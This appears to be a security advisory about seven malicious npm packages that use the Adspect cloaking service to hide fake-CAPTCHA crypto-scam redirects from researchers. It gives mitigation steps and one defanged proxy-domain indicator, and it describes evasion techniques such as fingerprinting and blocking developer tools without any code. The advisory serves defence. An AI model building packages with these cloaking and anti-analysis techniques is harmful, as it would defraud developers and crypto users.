Cybersecurity researchers identified seven npm packages published by a single threat actor, "dino_reborn," between September and November 2025, which use a cloaking service called Adspect to selectively target victims while evading security researchers. These packages contain malicious JavaScript code executed immediately upon import via Immediately Invoked Function Expressions (IIFE). The malware captures detailed system fingerprints and blocks developer tools in browsers to prevent analysis. It sends this fingerprint data to a proxy server to determine if the visitor is a real victim or a security researcher. Real victims are shown a fake CAPTCHA; upon interaction, they are redirected to fraudulent cryptocurrency-themed websites impersonating legitimate services like StandX, aiming to steal digital assets. Researchers and automated tools are served benign decoy pages with fake privacy policies to avoid detection. One package, "signals-embed," acts as a decoy without malicious payload. The npm account hosting these packages has been removed, but the packages had accumulated hundreds of downloads, indicating potential exposure. Adspect, the cloaking service used, is a commercial product designed to protect ad campaigns from unwanted traffic and offers “bulletproof cloaking” with no content restrictions, facilitating abuse by threat actors. This attack represents a novel combination of supply chain compromise, traffic cloaking, and anti-research techniques embedded in open-source packages, complicating detection and mitigation efforts.

European organizations using npm packages in their software supply chain could inadvertently introduce this malware into their environments, leading to exposure of developers or users to crypto scam sites and potential theft of digital assets. The attack undermines trust in open-source components and complicates supply chain security efforts. Organizations relying on JavaScript packages for web or backend development risk executing malicious code that can evade detection by security teams due to cloaking and anti-analysis features. The phishing component targeting cryptocurrency users could lead to financial losses and reputational damage. Additionally, the malware’s ability to block developer tools and fingerprint systems hinders incident response and forensic investigations. This threat could impact software development firms, fintech companies, and enterprises with active crypto asset management or blockchain-related projects. The medium severity reflects the phishing nature and supply chain vector, which, while not directly causing system compromise or data breaches, can facilitate fraud and financial theft.

European organizations should implement strict supply chain security controls including: 1) Enforce strict vetting and approval processes for npm packages, especially those newly published or from unknown authors; 2) Use automated tools to scan dependencies for malicious behavior and unusual network communications, focusing on traffic cloaking and fingerprinting indicators; 3) Employ runtime application self-protection (RASP) and browser security tools that can detect and block suspicious JavaScript behaviors such as developer tool blocking and immediate execution of unknown code; 4) Monitor network traffic for connections to suspicious proxy domains like "association-google[.]xyz" and block them at the network perimeter; 5) Educate developers on risks of supply chain attacks and encourage use of package integrity verification (e.g., checksums, signed packages); 6) Maintain an allowlist of trusted packages and consider using private registries or mirrors to control package sources; 7) Conduct regular audits of dependencies and remove unused or suspicious packages; 8) Collaborate with security researchers and npm maintainers to report and remove malicious packages promptly; 9) For organizations dealing with cryptocurrency, implement multi-factor authentication and transaction monitoring to detect fraudulent activities; 10) Use sandbox environments to test new packages before deployment to production.